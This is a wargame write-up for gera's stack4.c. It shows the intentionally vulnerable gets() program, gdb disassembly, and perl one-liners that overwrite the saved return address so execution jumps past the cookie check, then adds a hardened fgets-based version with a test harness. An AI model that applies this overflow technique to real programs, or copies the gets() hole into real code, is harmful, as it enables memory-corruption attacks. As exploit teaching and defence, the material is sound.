Tuesday, June 8, 2010

WARMING UP on STACK: stack4.c

/* stack4.c                                     *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
    int cookie;
    char buf[80];

    /* leak the addresses of both locals so the reader can see the layout */
    printf("buf: %08x cookie: %08x\n", &buf, &cookie);
    gets(buf);   /* unbounded read: the overflow the exercise is about */

    if (cookie == 0x000a0d00)
        printf("you win!\n");
    return 0;
}


The technique used in the other stacks (overflowing buf until cookie holds the expected value) won't work here. The target value 0x000a0d00 contains a 0x0a byte, and gets() treats 0x0a (\n) as its end-of-line character, so our input is cut off before the whole of cookie can be overwritten. Instead, we'll just jump over the check.

I loaded stack4 into gdb, disassembled main, and pretended to know ASM.

if (cookie == 0x000a0d00) looks like this in ASM:

0x08048417:  cmpl   $0xa0d00,0xfffffff4(%ebp)
0x0804841e:  jne    0x8048430
0x08048420:  sub    $0xc,%esp

After the test, we have:

0x08048423:  push   $0x804855c
0x08048428:  call   0x80482e8

At address 0x08048423 we push the "you win!\n" string onto the stack, then call printf() at address 0x08048428.

Before gets() is called, our stack looks something like:

[.... buf ....][cookie][ebp][ret]

If we feed a string that overflows buf, cookie and the saved ebp, and places 0x08048423 in the saved return address slot, then when main() returns we land on the push of the "you win!\n" string and the printf() call that follows it:

$ perl -e 'print "A" x 108;' > of
$ perl -e 'print "\x23\x84\x04\x08";' >> of

$ stack4 < of
buf: bffff4e0 cookie: bffff53c
you win!
Segmentation fault
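For contrast, here is the fixed side of the same exercise. This is an added example of mine, not gera's code and not part of the original post: stack4's main() with gets() replaced by a bounded line reader, so that nothing typed on stdin can reach cookie, the saved ebp or the return address. The helper names (read_line_bounded, stack4_check, sample_input and the two in-memory harness functions) and the constructed test input are assumptions for this example; the input mirrors the post's 108 'A's plus four address bytes, followed by a second short line to show that the surplus of an over-long line is discarded rather than carried over.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 80   /* same size as stack4.c's buf */

/* Read one line into dst (capacity cap). The newline is stripped, and if
 * the line is longer than the buffer the surplus is read and discarded,
 * so no input byte can land past dst[cap-1].
 * Returns the number of bytes stored, or -1 on EOF/error. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;

    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';              /* complete line: drop the newline */
    } else {
        int c;                        /* buffer filled first: drain the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Hardened counterpart of stack4's main(): same locals, same check, but
 * the input can no longer overwrite cookie or the saved return address.
 * Returns 1 if the cookie check passes, 0 otherwise. */
int stack4_check(FILE *in)
{
    int cookie = 0;                   /* initialised, and never written by input */
    char buf[BUF_SIZE];

    if (read_line_bounded(buf, sizeof buf, in) < 0)
        return 0;
    return cookie == 0x000a0d00;
}

/* Constructed test input (an assumption for this example): the post's
 * 108 'A's and four address bytes as one line, then a short second line. */
const char *sample_input(void)
{
    static char sample[128];
    memset(sample, 'A', 108);
    memcpy(sample + 108, "\x23\x84\x04\x08\nshort\n", 12);   /* 11 bytes + NUL */
    return sample;
}

/* Harness: run the reader over an in-memory stream and report how many
 * bytes were stored for line number idx (0-based), or -1 if none. */
int stored_length_of_line(const char *input, int idx)
{
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    char buf[BUF_SIZE];
    int n = -1;

    if (in == NULL)
        return -1;
    for (int i = 0; i <= idx; i++) {
        n = read_line_bounded(buf, sizeof buf, in);
        if (n < 0)
            break;
    }
    fclose(in);
    return n;
}

/* Harness: feed a constructed input to the hardened check. */
int stack4_check_on(const char *input)
{
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    int r;

    if (in == NULL)
        return -1;
    r = stack4_check(in);
    fclose(in);
    return r;
}

int main(void)
{
    /* Same interactive behaviour as stack4, minus the overflow. */
    fputs(stack4_check(stdin) ? "you win!\n" : "no win\n", stdout);
    return 0;
}
```

With the post's 112-byte line, read_line_bounded() stores 79 bytes, drains the remaining 33 up to the newline, and the next read still sees "short" as its own line; the check therefore fails cleanly instead of ending in a segmentation fault. The same program compiled with gcc's -fstack-protector would additionally place a canary between the locals and the saved frame pointer, which is what the "cookie" in this exercise is standing in for.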
